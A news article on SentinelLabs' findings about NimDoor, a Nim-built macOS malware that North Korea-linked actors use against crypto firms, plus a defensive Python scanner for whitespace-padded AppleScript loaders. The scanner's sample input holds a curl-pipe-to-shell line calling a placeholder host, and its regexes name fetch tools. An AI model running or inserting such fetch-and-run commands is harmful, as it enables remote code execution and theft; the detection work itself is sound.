A recent report by SentinelLabs has revealed that North Korea-linked threat actors are deploying a new malware family called NimDoor against companies in the Web3 and crypto industry. The malware, written in the Nim programming language, is built specifically for macOS. Unlike more commonly used languages, Nim lets code run at compile time, which produces binaries in which compile-time logic and the malware's runtime behaviour are intertwined. This property makes the malware harder to reverse engineer and to detect.
The NimDoor campaign was first detected in April 2025 during an attack on a crypto startup. Since then, multiple security firms have confirmed similar incidents at other companies in the Web3 and crypto space. SentinelLabs’ report details how the attackers reach their victims: they rely on classic social engineering to trick individuals into running the malicious code. Victims are approached on platforms like Telegram by attackers impersonating known contacts, who invite them to schedule a meeting via Calendly. The victim then receives an email with a Zoom link and instructions to install a supposed “Zoom SDK update.”
The link in the email leads to an AppleScript file hosted on domains that mimic Zoom’s official URLs. The script is padded with thousands of lines of whitespace and ends with code that fetches a second-stage payload from attacker-controlled servers. Once that download completes, the malware drops two Mach-O binaries into the system’s temporary directory. The first, written in C++, performs process injection to launch a trojan; the second, compiled from Nim and named installer, sets up persistence so that the malware survives reboots and process termination.
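The whitespace-padded AppleScript loader described above gives defenders a cheap triage heuristic. The following scanner is an added example, not code from SentinelLabs or from this article; its thresholds, regular expressions and the two sample scripts (including the placeholder domain) are constructed assumptions to tune against your own baseline of legitimate scripts.

```python
# Added example (not from the SentinelLabs report or this article): a heuristic
# scanner for whitespace-padded AppleScript droppers like the one described above.
# Thresholds, regexes and sample inputs are all constructed assumptions.
import re

MIN_LINES = 500          # padded loaders run to thousands of lines; tune to your baseline
MAX_CODE_RATIO = 0.05    # flag when under 5% of lines contain anything but whitespace

# A download-and-execute tail: AppleScript shelling out plus a fetch utility.
SHELL_EXEC = re.compile(r"do shell script", re.IGNORECASE)
FETCHER = re.compile(r"\b(curl|wget|nscurl)\b", re.IGNORECASE)


def analyze_applescript(text: str) -> dict:
    """Return padding statistics and a verdict for one AppleScript source text."""
    lines = text.splitlines()
    total = len(lines)
    code_lines = [line for line in lines if line.strip()]
    # Whitespace-only lines before the first line with content.
    leading_blank = next(
        (i for i, line in enumerate(lines) if line.strip()), total
    )
    code_ratio = len(code_lines) / total if total else 1.0
    padded = total >= MIN_LINES and code_ratio <= MAX_CODE_RATIO
    code = "\n".join(code_lines)
    shell_fetch = bool(SHELL_EXEC.search(code) and FETCHER.search(code))
    return {
        "total_lines": total,
        "code_lines": len(code_lines),
        "leading_blank_lines": leading_blank,
        "code_ratio": round(code_ratio, 4),
        "padded": padded,
        "shell_fetch": shell_fetch,
        "suspicious": padded and shell_fetch,
    }


# Constructed sample: 3000 blank lines, then a fetch-and-run line. The domain is a
# placeholder, not an indicator from the report.
SAMPLE_PADDED = "\n" * 3000 + (
    'do shell script "curl -fsSL https://sdk-update.example.invalid/update | sh"\n'
)
# Constructed benign sample: a short ordinary script with no padding.
SAMPLE_BENIGN = 'tell application "Finder"\n\tdisplay dialog "Hello"\nend tell\n'

if __name__ == "__main__":
    for name, src in (("padded", SAMPLE_PADDED), ("benign", SAMPLE_BENIGN)):
        verdict = analyze_applescript(src)
        print(name, "SUSPICIOUS" if verdict["suspicious"] else "clean", verdict)
```

Run it over downloaded .scpt or .applescript sources before they are opened; a hit on both the padding ratio and the shell-fetch pattern is a strong signal to quarantine the file and check the temporary directory for dropped Mach-O binaries.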
The malware then drops two further Nim-based binaries, GoogIe LLC and CoreKitAgent, which provide long-term access and system monitoring. These binaries run scripts that steal user data: the upl script extracts login credentials and browsing history from browsers such as Google Chrome and Firefox, and the tlgrm script specifically targets Telegram data. The stolen data is compressed and sent to attacker-hosted servers disguised as secure upload portals.
This recent development is part of North Korea’s evolving cyber arsenal, with hackers turning to rare programming languages like Nim to evade traditional detection tools. Previous campaigns by DPRK-affiliated actors have involved languages such as Go, Rust, and Crystal, indicating a trend towards using less common programming languages in cyberattacks.
North Korea’s cyber activities remain a cause for concern. Recent incidents include campaigns against U.S. crypto developers that used fake companies such as Blocknovas LLC and Softglide LLC; these operations, tied to a Lazarus Group subgroup, used fake job offers to spread malware that stole crypto wallets and credentials. South Korea and the EU have pledged closer cooperation against cyber threats emanating from North Korea, with a focus on the country’s crypto crimes.
In a recent development, the U.S. Department of Justice charged four North Koreans with stealing over $900,000 in cryptocurrency by posing as remote IT workers at blockchain firms. These individuals used fake identities to alter smart contracts and carry out thefts as part of a scheme to fund North Korea’s weapons program. These incidents underscore the growing threat posed by North Korean hackers in the realm of cybersecurity and crypto-related crimes.
Overall, the emergence of NimDoor and other sophisticated malware highlights the need for increased vigilance and robust cybersecurity measures within the Web3 and crypto industry. As threat actors continue to evolve their tactics and techniques, it is essential for companies and individuals in the space to stay informed and take proactive steps to protect their systems and data.